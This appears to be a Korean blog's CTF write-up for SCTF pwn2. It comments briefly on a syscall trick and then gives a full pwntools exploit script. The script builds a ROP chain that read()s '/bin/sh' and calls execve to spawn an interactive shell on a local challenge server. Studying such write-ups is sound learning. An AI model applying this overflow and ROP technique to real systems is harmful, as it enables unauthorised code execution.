생각하지 못했던 방법이 많다.
기본적일 수 있는데
생각하지 못했던 방식
eax ebx ecx edx 를 모두 0으로 만들어 놓고
1) read()로 /bin/sh 를 읽고
2) execve를 실행시킨다. 놀랍다
https://github.com/r00ta/myWriteUps/tree/master/SCTF/pwn2
[따라해보기]
w00t@ubuntu:~/Desktop/SCTF/pwn2$ cat a.py
from pwn import *
'''
.text:080484D0 syscall
.text:080484D3 inc eax
.text:080484D5 inc ebx
.text:080484D7 inc ecx
.text:080484D9 inc edx
.text:08048420 mov eax, 0
.text:08048459 mov edx, 0
.text:0804849a add ecx, ecx ; ret
0x0804835d : pop ebx ; ret
'''
inc_eax = 0x080484D3
inc_ebx = 0x080484D5
inc_ecx = 0x080484D7
inc_edx = 0x080484D9
eax0 = 0x08048420
edx0 = 0x08048459
ecxecx = 0x0804849a
syscall = 0x080484d0
popebx = 0x0804835d
payload=''
payload+='A'*48
payload+=p32(eax0)
payload+=p32(popebx)
payload+=p32(0xffffffff)
payload+=p32(inc_ebx)
payload+=p32(inc_ecx)
payload+=p32(edx0)
payload+=p32(inc_eax)*3
payload+=p32(inc_edx)*7
payload+=p32(inc_ecx)
payload+=p32(ecxecx)*9
payload+=p32(inc_ecx)
payload+=p32(ecxecx)*3
payload+=p32(inc_ecx)
payload+=p32(ecxecx)*2
payload+=p32(inc_ecx)
payload+=p32(ecxecx)*7
payload+=p32(inc_ecx)
payload+=p32(ecxecx)*6
payload+=p32(syscall)
payload+=p32(eax0)
payload+=p32(inc_eax)*11
payload+=p32(popebx)
payload+=p32(0x0804a040)
payload+=p32(ecxecx)*30
payload+=p32(edx0)
payload+=p32(syscall)
payload+=p32(0xdeadbeef)
p=remote("localhost",9999)
#p=proces("linux_server")
p.sendlineafter("read?","-1")
p.sendlineafter("data!",payload)
p.interactive()
'CTF' 카테고리의 다른 글
| [tum ctf 2016] hiecss - crpyto (0) | 2016.10.05 |
|---|---|
| [tum ctf 2016] haggis - crpyto (0) | 2016.10.03 |
| [tokyo 2016] ReverseBox (0) | 2016.09.12 |
| [tokyo ctf 2016]greeting (0) | 2016.09.06 |
| [plaidCTF]butterfly (0) | 2016.04.19 |
